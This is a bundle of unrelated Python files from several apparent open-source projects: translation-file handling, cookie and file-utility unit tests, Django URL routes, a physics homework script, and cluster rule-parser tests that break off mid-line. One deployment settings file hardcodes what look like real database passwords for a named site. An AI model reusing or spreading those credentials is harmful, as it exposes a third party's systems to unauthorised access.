append=False): self._rich_target = None if self.target == target: return if not self.hasplural(): super().settarget(target, lang, append) return if not isinstance(target, multistring): target = multistring(target) source = self.source sourcel = len(source.strings) targetl = len(target.strings) if sourcel < targetl: sources = source.strings + [source.strings[-1]] * (targetl - sourcel) targets = target.strings id = self.getid() self.source = multistring(sources) self.setid(id) elif targetl < sourcel: targets = target.strings + [""] * (sourcel - targetl) else: targets = target.strings for i in range(len(self.units)): self.units[i].target = targets[i] def addnote(self, text, origin=None, position="append"): """Add a note specifically in a "note" tag""" note = etree.SubElement(self.xmlelement, self.namespaced("note")) note.text = text if origin: note.set("from", origin) for unit in self.units[1:]: unit.addnote(text, origin) def getnotes(self, origin=None): # NOTE: We support both <context> and <note> tags in xliff files for comments if origin == "translator": notes = super().getnotes("translator") trancomments = self.gettranslatorcomments() if notes == trancomments or trancomments.find(notes) >= 0: notes = "" elif notes.find(trancomments) >= 0: trancomments = notes notes = "" return trancomments + notes elif origin in ["programmer", "developer", "source code"]: devcomments = super().getnotes("developer") autocomments = self.getautomaticcomments() if devcomments == autocomments or autocomments.find(devcomments) >= 0: devcomments = "" elif devcomments.find(autocomments) >= 0: autocomments = devcomments devcomments = "" return autocomments else: return super().getnotes(origin) def markfuzzy(self, value=True): super().markfuzzy(value) for unit in self.units[1:]: unit.markfuzzy(value) def marktranslated(self): super().marktranslated() for unit in self.units[1:]: unit.marktranslated() def setid(self, id): super().setid(id) if len(self.units) > 1: for i in range(len(self.units)): self.units[i].setid("%s[%d]" % (id, i)) def getlocations(self): """Returns all the references (source locations)""" groups = self.getcontextgroups("po-reference") references = [] for group in groups: sourcefile = "" linenumber = "" for (type, text) in group: if type == "sourcefile": sourcefile = text elif type == "linenumber": linenumber = text assert sourcefile if linenumber: sourcefile = sourcefile + ":" + linenumber references.append(sourcefile) return references def getautomaticcomments(self): """Returns the automatic comments (x-po-autocomment), which corresponds to the #. style po comments. """ def hasautocomment(grp): return grp[0] == "x-po-autocomment" groups = self.getcontextgroups("po-entry") comments = [] for group in groups: commentpairs = filter(hasautocomment, group) for (type, text) in commentpairs: comments.append(text) return "\n".join(comments) def gettranslatorcomments(self): """Returns the translator comments (x-po-trancomment), which corresponds to the # style po comments. """ def hastrancomment(grp): return grp[0] == "x-po-trancomment" groups = self.getcontextgroups("po-entry") comments = [] for group in groups: commentpairs = filter(hastrancomment, group) for (type, text) in commentpairs: comments.append(text) return "\n".join(comments) def isheader(self): return "gettext-domain-header" in (self.getrestype() or "") def istranslatable(self): return super().istranslatable() and not self.isheader() @classmethod def createfromxmlElement(cls, element, namespace=None): if element.tag.endswith("trans-unit"): object = cls(None, empty=True) object.xmlelement = element object.namespace = namespace return object assert element.tag.endswith("group") group = cls(None, empty=True) group.xmlelement = element group.namespace = namespace units = list(element.iterdescendants(group.namespaced("trans-unit"))) for unit in units: subunit = xliff.xliffunit.createfromxmlElement(unit) subunit.namespace = namespace group.units.append(subunit) return group def hasplural(self): return self.xmlelement.tag == self.namespaced("group") class PoXliffFile(xliff.xlifffile, poheader.poheader): """a file for the po variant of Xliff files""" UnitClass = PoXliffUnit def __init__(self, *args, **kwargs): if "sourcelanguage" not in kwargs: kwargs["sourcelanguage"] = "en-US" xliff.xlifffile.__init__(self, *args, **kwargs) def createfilenode(self, filename, sourcelanguage="en-US", datatype="po"): # Let's ignore the sourcelanguage parameter opting for the internal # one. PO files will probably be one language return super().createfilenode( filename, sourcelanguage=self.sourcelanguage, datatype="po" ) def _insert_header(self, header): header.xmlelement.set("restype", "x-gettext-domain-header") header.xmlelement.set("approved", "no") setXMLspace(header.xmlelement, "preserve") self.addunit(header) def addheaderunit(self, target, filename): unit = self.addsourceunit(target, filename, True) unit.target = target unit.xmlelement.set("restype", "x-gettext-domain-header") unit.xmlelement.set("approved", "no") setXMLspace(unit.xmlelement, "preserve") return unit def addplural(self, source, target, filename, createifmissing=False): """This method should now be unnecessary, but is left for reference""" assert isinstance(source, multistring) if not isinstance(target, multistring): target = multistring(target) sourcel = len(source.strings) targetl = len(target.strings) if sourcel < targetl: sources = source.strings + [source.strings[-1]] * targetl - sourcel targets = target.strings else: sources = source.strings targets = target.strings self._messagenum += 1 pluralnum = 0 group = self.creategroup(filename, True, restype="x-gettext-plural") for (src, tgt) in zip(sources, targets): unit = self.UnitClass(src) unit.target = tgt unit.setid("%d[%d]" % (self._messagenum, pluralnum)) pluralnum += 1 group.append(unit.xmlelement) self.units.append(unit) if pluralnum < sourcel: for string in sources[pluralnum:]: unit = self.UnitClass(src) unit.xmlelement.set("translate", "no") unit.setid("%d[%d]" % (self._messagenum, pluralnum)) pluralnum += 1 group.append(unit.xmlelement) self.units.append(unit) return self.units[-pluralnum] def parse(self, xml): """Populates this object from the given xml string""" # TODO: Make more robust def ispluralgroup(node): """determines whether the xml node refers to a getttext plural""" return node.get("restype") == "x-gettext-plurals" def isnonpluralunit(node): """determindes whether the xml node contains a plural like id. We want to filter out all the plural nodes, except the very first one in each group. """ return re.match(r".+\[[123456]\]$", node.get("id") or "") is None def pluralunits(pluralgroups): for pluralgroup in pluralgroups: yield self.UnitClass.createfromxmlElement( pluralgroup, namespace=self.namespace ) self.filename = getattr(xml, "name", "") if hasattr(xml, "read"): xml.seek(0) xmlsrc = xml.read() xml = xmlsrc parser = etree.XMLParser(resolve_entities=False) self.document = etree.fromstring(xml, parser).getroottree() self.initbody() root_node = self.document.getroot() assert root_node.tag == self.namespaced(self.rootNode) groups = root_node.iterdescendants(self.namespaced("group")) pluralgroups = filter(ispluralgroup, groups) termEntries = root_node.iterdescendants( self.namespaced(self.UnitClass.rootNode) ) singularunits = list(filter(isnonpluralunit, termEntries)) if len(singularunits) == 0: return pluralunit_iter = pluralunits(pluralgroups) nextplural = next(pluralunit_iter, None) for entry in singularunits: term = self.UnitClass.createfromxmlElement(entry, namespace=self.namespace) if nextplural and str(term.getid()) == ("%s[0]" % nextplural.getid()): self.addunit(nextplural, new=False) nextplural = next(pluralunit_iter, None) else: self.addunit(term, new=False)
mikf/gallery-dl
test/test_cookies.py
#!/usr/bin/env python3 # -*- coding: utf-8 -*- # Copyright 2017-2022 Mike Fährmann # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License version 2 as # published by the Free Software Foundation. import os import sys import unittest from unittest import mock import time import logging import tempfile from os.path import join sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__)))) from gallery_dl import config, extractor # noqa E402 class TestCookiejar(unittest.TestCase): @classmethod def setUpClass(cls): cls.path = tempfile.TemporaryDirectory() cls.cookiefile = join(cls.path.name, "cookies.txt") with open(cls.cookiefile, "w") as file: file.write("""# HTTP Cookie File .example.org\tTRUE\t/\tFALSE\t253402210800\tNAME\tVALUE """) cls.invalid_cookiefile = join(cls.path.name, "invalid.txt") with open(cls.invalid_cookiefile, "w") as file: file.write("""# asd .example.org\tTRUE/FALSE\t253402210800\tNAME\tVALUE """) @classmethod def tearDownClass(cls): cls.path.cleanup() config.clear() def test_cookiefile(self): config.set((), "cookies", self.cookiefile) cookies = extractor.find("test:").session.cookies self.assertEqual(len(cookies), 1) cookie = next(iter(cookies)) self.assertEqual(cookie.domain, ".example.org") self.assertEqual(cookie.path , "/") self.assertEqual(cookie.name , "NAME") self.assertEqual(cookie.value , "VALUE") def test_invalid_cookiefile(self): self._test_warning(self.invalid_cookiefile, ValueError) def test_invalid_filename(self): self._test_warning(join(self.path.name, "nothing"), FileNotFoundError) def _test_warning(self, filename, exc): config.set((), "cookies", filename) log = logging.getLogger("test") with mock.patch.object(log, "warning") as mock_warning: cookies = extractor.find("test:").session.cookies self.assertEqual(len(cookies), 0) self.assertEqual(mock_warning.call_count, 1) self.assertEqual(mock_warning.call_args[0][0], "cookies: %s") self.assertIsInstance(mock_warning.call_args[0][1], exc) class TestCookiedict(unittest.TestCase): def setUp(self): self.cdict = {"NAME1": "VALUE1", "NAME2": "VALUE2"} config.set((), "cookies", self.cdict) def tearDown(self): config.clear() def test_dict(self): cookies = extractor.find("test:").session.cookies self.assertEqual(len(cookies), len(self.cdict)) self.assertEqual(sorted(cookies.keys()), sorted(self.cdict.keys())) self.assertEqual(sorted(cookies.values()), sorted(self.cdict.values())) def test_domain(self): for category in ["exhentai", "idolcomplex", "nijie", "seiga"]: extr = _get_extractor(category) cookies = extr.session.cookies for key in self.cdict: self.assertTrue(key in cookies) for c in cookies: self.assertEqual(c.domain, extr.cookiedomain) class TestCookieLogin(unittest.TestCase): def tearDown(self): config.clear() def test_cookie_login(self): extr_cookies = { "exhentai" : ("ipb_member_id", "ipb_pass_hash"), "idolcomplex": ("login", "pass_hash"), "nijie" : ("nemail", "nlogin"), "seiga" : ("user_session",), } for category, cookienames in extr_cookies.items(): cookies = {name: "value" for name in cookienames} config.set((), "cookies", cookies) extr = _get_extractor(category) with mock.patch.object(extr, "_login_impl") as mock_login: extr.login() mock_login.assert_not_called() class TestCookieUtils(unittest.TestCase): def test_check_cookies(self): extr = extractor.find("test:") self.assertFalse(extr._cookiejar, "empty") self.assertFalse(extr.cookiedomain, "empty") # always returns False when checking for empty cookie list self.assertFalse(extr._check_cookies(())) self.assertFalse(extr._check_cookies(("a",))) self.assertFalse(extr._check_cookies(("a", "b"))) self.assertFalse(extr._check_cookies(("a", "b", "c"))) extr._cookiejar.set("a", "1") self.assertTrue(extr._check_cookies(("a",))) self.assertFalse(extr._check_cookies(("a", "b"))) self.assertFalse(extr._check_cookies(("a", "b", "c"))) extr._cookiejar.set("b", "2") self.assertTrue(extr._check_cookies(("a",))) self.assertTrue(extr._check_cookies(("a", "b"))) self.assertFalse(extr._check_cookies(("a", "b", "c"))) def test_check_cookies_domain(self): extr = extractor.find("test:") self.assertFalse(extr._cookiejar, "empty") extr.cookiedomain = ".example.org" self.assertFalse(extr._check_cookies(("a",))) self.assertFalse(extr._check_cookies(("a", "b"))) extr._cookiejar.set("a", "1") self.assertFalse(extr._check_cookies(("a",))) extr._cookiejar.set("a", "1", domain=extr.cookiedomain) self.assertTrue(extr._check_cookies(("a",))) extr._cookiejar.set("a", "1", domain="www" + extr.cookiedomain) self.assertEqual(len(extr._cookiejar), 3) self.assertTrue(extr._check_cookies(("a",))) extr._cookiejar.set("b", "2", domain=extr.cookiedomain) extr._cookiejar.set("c", "3", domain=extr.cookiedomain) self.assertTrue(extr._check_cookies(("a", "b", "c"))) def test_check_cookies_expires(self): extr = extractor.find("test:") self.assertFalse(extr._cookiejar, "empty") self.assertFalse(extr.cookiedomain, "empty") now = int(time.time()) log = logging.getLogger("test") extr._cookiejar.set("a", "1", expires=now-100) with mock.patch.object(log, "warning") as mw: self.assertFalse(extr._check_cookies(("a",))) self.assertEqual(mw.call_count, 1) self.assertEqual(mw.call_args[0], ("Cookie '%s' has expired", "a")) extr._cookiejar.set("a", "1", expires=now+100) with mock.patch.object(log, "warning") as mw: self.assertFalse(extr._check_cookies(("a",))) self.assertEqual(mw.call_count, 1) self.assertEqual(mw.call_args[0], ( "Cookie '%s' will expire in less than %s hour%s", "a", 1, "")) extr._cookiejar.set("a", "1", expires=now+100+7200) with mock.patch.object(log, "warning") as mw: self.assertFalse(extr._check_cookies(("a",))) self.assertEqual(mw.call_count, 1) self.assertEqual(mw.call_args[0], ( "Cookie '%s' will expire in less than %s hour%s", "a", 3, "s")) extr._cookiejar.set("a", "1", expires=now+100+24*3600) with mock.patch.object(log, "warning") as mw: self.assertTrue(extr._check_cookies(("a",))) self.assertEqual(mw.call_count, 0) def _get_extractor(category): for extr in extractor.extractors(): if extr.category == category and hasattr(extr, "_login_impl"): url = next(extr._get_tests())[0] return extr.from_url(url) if __name__ == "__main__": unittest.main()
amites/nedcompost_wordpress
fabsettings.py
from os import path try: from lib.settings_build import Configure except ImportError: import sys from os.path import expanduser, join sys.path.append(join(expanduser("~"), 'workspace/automation/launchy')) from lib.settings_build import Configure class Default(Configure): def __init__(self): self.beta = False self.local = False self.project = 'nedcompost' self.php = True self.database_name = self.project self.database_user = self.project self.path_project_root = path.join('/mnt', self.project) self.setDefaults() if getattr(self, 'host', False): self.setHost() class Local(Default): def __init__(self): self.beta = True self.local = True self.database_root_password = 'password' super(Local, self).__init__() class Production(Default): def __init__(self): self.host = ['aws-php-3', ] self.domain = 'nedcompost.org' self.database_root_password = 'password' # self.database_password = 'iNcJ%kx87[M>L:!6pkY$fXZIu' self.database_password = 'zHR-mp)@ZZydJ=s9R}*S+4,!a' super(Production, self).__init__() class Beta(Default): def __init__(self): self.beta = True self.host = ['aws-php-3', ] self.domain = 'nedcompost.mitesdesign.com' self.database_root_password = 'password' self.database_password = 'zHR-mp)@ZZydJ=s9R}*S+4,!a' super(Beta, self).__init__() try: from local_settings import * except ImportError: pass
smorad/ast119
hw5.py
from numpy import * from matplotlib.pyplot import * import scipy.constants as sc import copy import scipy.integrate as integ # test sun/earth with hw5(1.989e30,5.972e24,149.6e6,0.0167,1000) def hw5(m1, m2, a, e, tmax, tstep=0.001, tplot=0.025, method='leapfrog'): if method != 'leapfrog' and method != 'odeint': print("That's not a method") return() # initialize commonly used variables period = sqrt((4*(pi**2)*(a**3)) / (sc.G*(m1 + m2))) dt = period*tstep # initialize objects at time 0 q = m1 / m2 r0 = (1-e)*a/(1+q) v0 = (1/(1+q))*sqrt((1+e)/(1-e))*sqrt(sc.G*(m1+m2)/a) rv = array([r0, 0, 0, v0, -q*r0, 0, 0, -q*v0]) # set up figure figure(1) gca().set_aspect('equal') xlim([-2*a, 2*a]) ylim([-2*a, 2*a]) rv_list = [] if method == 'leapfrog': timeCounter = 0 frameCounter = 0 while timeCounter < tmax: # plot positions if tplot time has passed if frameCounter >= tplot: frameCounter = 0 rv_list.append(copy.deepcopy(rv)) # calc positions rv[0] = rv[0] + rv[2]*dt rv[1] = rv[1] + rv[3]*dt rv[4] = rv[4] + rv[6]*dt rv[5] = rv[5] + rv[7]*dt # calc acceleration r = array([rv[0] - rv[4], rv[1] - rv[5]]) force = ((sc.G*m1*m2)/(np.linalg.norm(r)**2))*(r/np.linalg.norm(r)) # calc velocity rv[2] = rv[2] - (force[0]/m1)*dt rv[3] = rv[3] - (force[1]/m1)*dt rv[6] = rv[6] + (force[0]/m2)*dt rv[7] = rv[7] + (force[1]/m2)*dt # increment counters timeCounter += tstep frameCounter += tstep # plot final position rv_list.append(copy.deepcopy(rv)) rv_list_plot = rv_list else: # odeint rv_list = integ.odeint(deriv, rv, arange(0, tmax*period, dt), (m1, m2)) # needed to calculate using tstep, but we want to plot # using tplot, t_interval = tplot / tstep rv_list_plot = rv_list[::t_interval] # plot for i in range(len(rv_list_plot)): plot(rv_list_plot[i][0],rv_list_plot[i][1],'bo') plot(rv_list_plot[i][4],rv_list_plot[i][5],'go') draw() def deriv(rv, dt, m1, m2): # calc position deriv rv_copy = zeros(8) rv_copy[0] = rv[2] rv_copy[1] = rv[3] rv_copy[4] = rv[6] rv_copy[5] = rv[7] # calc velocity deriv r = array([rv[0] - rv[4], rv[1] - rv[5]]) force = ((sc.G*m1*m2)/(np.linalg.norm(r)**2))*(r/np.linalg.norm(r)) rv_copy[2] = - (force[0]/m1) rv_copy[3] = - (force[1]/m1) rv_copy[6] = + (force[0]/m2) rv_copy[7] = + (force[1]/m2) return rv_copy
edwardbadboy/vdsm-ubuntu
tests/fileUtilTests.py
# # Copyright 2012 Red Hat, Inc. # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA # # Refer to the README and COPYING files for full details of the license # import tempfile import os import storage.fileUtils as fileUtils import testValidation from testrunner import VdsmTestCase as TestCaseBase class DirectFileTests(TestCaseBase): @classmethod def getConfigTemplate(cls): return {} def testRead(self): data = """Vestibulum. Libero leo nostra, pede nunc eu. Pellentesque platea lacus morbi nisl montes ve. Ac. A, consectetuer erat, justo eu. Elementum et, phasellus fames et rutrum donec magnis eu bibendum. Arcu, ante aliquam ipsum ut facilisis ad.""" srcFd, srcPath = tempfile.mkstemp() f = os.fdopen(srcFd, "wb") f.write(data) f.flush() f.close() with fileUtils.open_ex(srcPath, "dr") as f: self.assertEquals(f.read(), data) os.unlink(srcPath) def testSeekRead(self): data = """ Habitasse ipsum at fusce litora metus, placerat dui purus aenean ante, ve. Pede hymenaeos ut primis cum, rhoncus, lectus, nunc. Vestibulum curabitur vitae etiam magna auctor velit, mi tempus vivamus orci eros. Pellentesque curabitur risus fermentum eget. Elementum curae, donec nisl egestas ve, ut odio eu nunc elit felis primis id. Ridiculus metus morbi nulla erat, amet nisi. Amet ligula nisi, id penatibus risus in. Purus velit duis. Aenean eget, pellentesque eu rhoncus arcu et consectetuer laoreet, augue nisi dictum lacinia urna. Fermentum torquent. Ut interdum vivamus duis. Felis consequat nec pede. Orci sollicitudin parturient orci felis. Enim, diam velit sapien condimentum fames semper nibh. Integer at, egestas pede consectetuer ac augue pharetra dolor non placerat quisque id cursus ultricies. Ligula mi senectus sit. Habitasse. Integer sollicitudin dapibus cum quam. """ self.assertTrue(len(data) > 512) srcFd, srcPath = tempfile.mkstemp() f = os.fdopen(srcFd, "wb") f.write(data) f.flush() f.close() with fileUtils.open_ex(srcPath, "dr") as f: f.seek(512) self.assertEquals(f.read(), data[512:]) os.unlink(srcPath) def testWrite(self): data = """In ut non platea egestas, quisque magnis nunc nostra ac etiam suscipit nec integer sociosqu. Fermentum. Ante orci luctus, ipsum ullamcorper enim arcu class neque inceptos class. Ut, sagittis torquent, commodo facilisi.""" srcFd, srcPath = tempfile.mkstemp() os.close(srcFd) with fileUtils.open_ex(srcPath, "dw") as f: f.write(data) with fileUtils.open_ex(srcPath, "r") as f: self.assertEquals(f.read(len(data)), data) os.unlink(srcPath) def testSmallWrites(self): data = """ Aliquet habitasse tellus. Fringilla faucibus tortor parturient consectetuer sodales, venenatis platea habitant. Hendrerit nostra nunc odio. Primis porttitor consequat enim ridiculus. Taciti nascetur, nibh, convallis sit, cum dis mi. Nonummy justo odio cursus, ac hac curabitur nibh. Tellus. Montes, ut taciti orci ridiculus facilisis nunc. Donec. Risus adipiscing habitant donec vehicula non vitae class, porta vitae senectus. Nascetur felis laoreet integer, tortor ligula. Pellentesque vestibulum cras nostra. Ut sollicitudin posuere, per accumsan curabitur id, nisi fermentum vel, eget netus tristique per, donec, curabitur senectus ut fusce. A. Mauris fringilla senectus et eni facilisis magna inceptos eu, cursus habitant fringilla neque. Nibh. Elit facilisis sed, elit, nostra ve torquent dictumst, aenean sapien quam, habitasse in. Eu tempus aptent, diam, nisi risus pharetra, ac, condimentum orci, consequat mollis. Cras lacus augue ultrices proin fermentum nibh sed urna. Ve ipsum ultrices curae, feugiat faucibus proin et elementum vivamus, lectus. Torquent. Tempus facilisi. Cras suspendisse euismod consectetuer ornare nostra. Fusce amet cum amet diam. """ self.assertTrue(len(data) > 512) srcFd, srcPath = tempfile.mkstemp() os.close(srcFd) with fileUtils.open_ex(srcPath, "dw") as f: f.write(data[:512]) f.write(data[512:]) with fileUtils.open_ex(srcPath, "r") as f: self.assertEquals(f.read(len(data)), data) os.unlink(srcPath) def testUpdateRead(self): data = """ Aliquet. Aliquam eni ac nullam iaculis cras ante, adipiscing. Enim eget egestas pretium. Ultricies. Urna cubilia in, hac. Curabitur. Nibh. Purus ridiculus natoque sed id. Feugiat lacus quam, arcu maecenas nec egestas. Hendrerit duis nunc eget dis lacus porttitor per sodales class diam condimentum quisque condimentum nisi ligula. Dapibus blandit arcu nam non ac feugiat diam, dictumst. Ante eget fames eu penatibus in, porta semper accumsan adipiscing tellus in sagittis. Est parturient parturient mi fermentum commodo, per fermentum. Quis duis velit at quam risus mi. Facilisi id fames. Turpis, conubia rhoncus. Id. Elit eni tellus gravida, ut, erat morbi. Euismod, enim a ante vestibulum nibh. Curae curae primis vulputate adipiscing arcu ipsum suspendisse quam hymenaeos primis accumsan vestibulum. """ self.assertTrue(len(data) > 512) srcFd, srcPath = tempfile.mkstemp() os.close(srcFd) with fileUtils.open_ex(srcPath, "wd") as f: f.write(data[:512]) with fileUtils.open_ex(srcPath, "r+d") as f: f.seek(512) f.write(data[512:]) with fileUtils.open_ex(srcPath, "r") as f: self.assertEquals(f.read(len(data)), data) os.unlink(srcPath) class ChownTests(TestCaseBase): @testValidation.ValidateRunningAsRoot def test(self): targetId = 666 srcFd, srcPath = tempfile.mkstemp() os.close(srcFd) fileUtils.chown(srcPath, targetId, targetId) stat = os.stat(srcPath) self.assertTrue(stat.st_uid == stat.st_gid == targetId) os.unlink(srcPath) @testValidation.ValidateRunningAsRoot def testNames(self): # I convert to some id because I have no # idea what users are defined and what # there IDs are apart from root tmpId = 666 srcFd, srcPath = tempfile.mkstemp() os.close(srcFd) fileUtils.chown(srcPath, tmpId, tmpId) stat = os.stat(srcPath) self.assertTrue(stat.st_uid == stat.st_gid == tmpId) fileUtils.chown(srcPath, "root", "root") stat = os.stat(srcPath) self.assertTrue(stat.st_uid == stat.st_gid == 0) class CopyUserModeToGroupTests(TestCaseBase): MODE_MASK = 0777 # format: initialMode, expectedMode modesList = [ (0770, 0770), (0700, 0770), (0750, 0770), (0650, 0660), ] def testCopyUserModeToGroup(self): fd, path = tempfile.mkstemp() try: os.close(fd) for initialMode, expectedMode in self.modesList: os.chmod(path, initialMode) fileUtils.copyUserModeToGroup(path) self.assertEquals(os.stat(path).st_mode & self.MODE_MASK, expectedMode) finally: os.unlink(path)
meletakis/collato
esn/actstream/urls.py
try: from django.conf.urls import url, patterns except ImportError: from django.conf.urls.defaults import url, patterns from actstream import feeds from actstream import views from django.contrib.auth.decorators import login_required urlpatterns = patterns('actstream.views', # Syndication Feeds url(r'^feed/(?P<content_type_id>\d+)/(?P<object_id>\d+)/atom/$', feeds.AtomObjectActivityFeed(), name='actstream_object_feed_atom'), url(r'^feed/(?P<content_type_id>\d+)/(?P<object_id>\d+)/$', feeds.ObjectActivityFeed(), name='actstream_object_feed'), url(r'^feed/(?P<content_type_id>\d+)/atom/$', feeds.AtomModelActivityFeed(), name='actstream_model_feed_atom'), url(r'^feed/(?P<content_type_id>\d+)/(?P<object_id>\d+)/as/$', feeds.ActivityStreamsObjectActivityFeed(), name='actstream_object_feed_as'), url(r'^feed/(?P<content_type_id>\d+)/$', feeds.ModelActivityFeed(), name='actstream_model_feed'), url(r'^feed/$', feeds.UserActivityFeed(), name='actstream_feed'), url(r'^feed/atom/$', feeds.AtomUserActivityFeed(), name='actstream_feed_atom'), # Follow/Unfollow API url(r'^follow/(?P<content_type_id>\d+)/(?P<object_id>\d+)/$', 'follow_unfollow', name='actstream_follow'), url(r'^follow_all/(?P<content_type_id>\d+)/(?P<object_id>\d+)/$', 'follow_unfollow', {'actor_only': False}, name='actstream_follow_all'), url(r'^unfollow/(?P<content_type_id>\d+)/(?P<object_id>\d+)/$', 'follow_unfollow', {'do_follow': False}, name='actstream_unfollow'), # Follower and Actor lists url(r'^followers/(?P<content_type_id>\d+)/(?P<object_id>\d+)/$', 'followers', name='actstream_followers'), url(r'^actors/(?P<content_type_id>\d+)/(?P<object_id>\d+)/$', 'actor', name='actstream_actor'), url(r'^actors/(?P<content_type_id>\d+)/$', 'model', name='actstream_model'), url(r'^new_wall_post/$', view=login_required (views.new_wall_post), name='new_wall_post'), url(r'^detail/(?P<action_id>\d+)/$', view=login_required(views.detail), name='actstream_detail'), url(r'^(?P<username>[-\w]+)/$', view=login_required (views.user), name='actstream_user'), url(r'^$', view=login_required (views.stream), name='actstream'), url(r'^new_group_post', view=login_required (views.new_group_post), name='new_group_post'), )
mshcruz/LearnPythonTheHardWay
ex40.py
class Song(object): def __init__(self, lyrics): self.lyrics = lyrics def sing_me_a_song(self): for line in self.lyrics: print line happy_bday = Song(["Happy birthday to you", "I don't want to get sued", "So I'll stop right here"]) bulls_on_parade = Song(["They rally around tha family", "With pockets full of shells"]) happy_bday.sing_me_a_song() bulls_on_parade.sing_me_a_song()
tradej/pcs
pcs/test/test_rule.py
from __future__ import absolute_import import os import sys import shutil import unittest import xml.dom.minidom parentdir = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) sys.path.insert(0, parentdir) from pcs_test_functions import pcs,ac import rule empty_cib = "empty.xml" temp_cib = "temp.xml" class DateValueTest(unittest.TestCase): def testParse(self): for value, item in enumerate(rule.DateCommonValue.allowed_items, 1): self.assertEquals( str(value), rule.DateCommonValue("%s=%s" % (item, value)).parts[item] ) value = rule.DateCommonValue( "hours=1 monthdays=2 weekdays=3 yeardays=4 months=5 weeks=6 " "years=7 weekyears=8 moon=9" ) self.assertEquals("1", value.parts["hours"]) self.assertEquals("2", value.parts["monthdays"]) self.assertEquals("3", value.parts["weekdays"]) self.assertEquals("4", value.parts["yeardays"]) self.assertEquals("5", value.parts["months"]) self.assertEquals("6", value.parts["weeks"]) self.assertEquals("7", value.parts["years"]) self.assertEquals("8", value.parts["weekyears"]) self.assertEquals("9", value.parts["moon"]) value = rule.DateCommonValue("hours=1 monthdays=2 hours=3") self.assertEquals("2", value.parts["monthdays"]) self.assertEquals("3", value.parts["hours"]) value = rule.DateCommonValue(" hours=1 monthdays=2 hours=3 ") self.assertEquals("2", value.parts["monthdays"]) self.assertEquals("3", value.parts["hours"]) self.assertSyntaxError( "missing one of 'hours=', 'monthdays=', 'weekdays=', 'yeardays=', " "'months=', 'weeks=', 'years=', 'weekyears=', 'moon=' in date-spec", "", rule.DateSpecValue ) self.assertSyntaxError( "missing value after 'hours=' in date-spec", "hours=", rule.DateSpecValue ) self.assertSyntaxError( "missing =value after 'hours' in date-spec", "hours", rule.DateSpecValue ) self.assertSyntaxError( "unexpected 'foo=bar' in date-spec", "foo=bar", rule.DateSpecValue ) self.assertSyntaxError( "unexpected 'foo=bar' in date-spec", "hours=1 foo=bar", rule.DateSpecValue ) def testDurationValidate(self): for value, item in enumerate(rule.DateCommonValue.allowed_items, 1): self.assertEquals( str(value), rule.DateDurationValue("%s=%s" % (item, value)).parts[item] ) for item in rule.DateCommonValue.allowed_items: self.assertSyntaxError( "invalid %s '%s' in 'duration'" % (item, "foo"), "%s=foo" % item, rule.DateDurationValue ) self.assertSyntaxError( "invalid %s '%s' in 'duration'" % (item, "-1"), "%s=-1" % item, rule.DateDurationValue ) self.assertSyntaxError( "invalid %s '%s' in 'duration'" % (item, "2foo"), "%s=2foo" % item, rule.DateDurationValue ) def testDateSpecValidation(self): for item in rule.DateCommonValue.allowed_items: value = 1 self.assertEquals( str(value), rule.DateSpecValue("%s=%s" % (item, value)).parts[item] ) self.assertEquals( "%s-%s" % (value, value + 1), rule.DateSpecValue( "%s=%s-%s" % (item, value, value + 1) ).parts[item] ) self.assertEquals( "hours=9-16 weekdays=1-5", str(rule.DateSpecValue("hours=9-16 weekdays=1-5")) ) for item in rule.DateCommonValue.allowed_items: self.assertSyntaxError( "invalid %s '%s' in 'date-spec'" % (item, "foo"), "%s=foo" % item, rule.DateSpecValue ) self.assertSyntaxError( "invalid %s '%s' in 'date-spec'" % (item, "1-foo"), "%s=1-foo" % item, rule.DateSpecValue ) self.assertSyntaxError( "invalid %s '%s' in 'date-spec'" % (item, "foo-1"), "%s=foo-1" % item, rule.DateSpecValue ) self.assertSyntaxError( "invalid %s '%s' in 'date-spec'" % (item, "1-2-3"), "%s=1-2-3" % item, rule.DateSpecValue ) self.assertSyntaxError( "invalid %s '%s' in 'date-spec'" % (item, "2-1"), "%s=2-1" % item, rule.DateSpecValue ) self.assertSyntaxError( "invalid hours '24' in 'date-spec'", "hours=24", rule.DateSpecValue ) self.assertSyntaxError( "invalid monthdays '32' in 'date-spec'", "monthdays=32", rule.DateSpecValue ) self.assertSyntaxError( "invalid weekdays '8' in 'date-spec'", "weekdays=8", rule.DateSpecValue ) self.assertSyntaxError( "invalid yeardays '367' in 'date-spec'", "yeardays=367", rule.DateSpecValue ) self.assertSyntaxError( "invalid months '13' in 'date-spec'", "months=13", rule.DateSpecValue ) self.assertSyntaxError( "invalid weeks '54' in 'date-spec'", "weeks=54", rule.DateSpecValue ) self.assertSyntaxError( "invalid weekyears '54' in 'date-spec'", "weekyears=54", rule.DateSpecValue ) self.assertSyntaxError( "invalid moon '8' in 'date-spec'", "moon=8", rule.DateSpecValue ) self.assertSyntaxError( "invalid hours '12-8' in 'date-spec'", "hours=12-8", rule.DateSpecValue ) def assertSyntaxError(self, syntax_error, parts_string, value_class=None): value_class = value_class if value_class else rule.DateCommonValue self.assertRaises(rule.SyntaxError, value_class, parts_string) try: value_class(parts_string) except rule.SyntaxError as e: self.assertEquals(syntax_error, str(e)) class ParserTest(unittest.TestCase): def setUp(self): self.parser = rule.RuleParser() def testEmptyInput(self): self.assertRaises(rule.UnexpectedEndOfInput, self.parser.parse, []) def testSingleLiteral(self): self.assertSyntaxError( "missing one of 'eq', 'ne', 'lt', 'gt', 'lte', 'gte', 'in_range', " "'defined', 'not_defined', 'date-spec'", ["#uname"] ) self.assertSyntaxError( "missing one of 'eq', 'ne', 'lt', 'gt', 'lte', 'gte', 'in_range', " "'defined', 'not_defined', 'date-spec'", ["string", "node1"] ) def testSingleLiteralDatespec(self): self.assertEquals( "(date-spec (literal hours=1))", str(self.parser.parse(["date-spec", "hours=1"])) ) self.assertEquals( "(date-spec (literal hours=1-14 months=1 monthdays=20-30))", str(self.parser.parse([ "date-spec", "hours=1-14 months=1 monthdays=20-30" ])) ) self.assertUnexpectedEndOfInput(["date-spec"]) def testSimpleExpression(self): self.assertEquals( "(eq 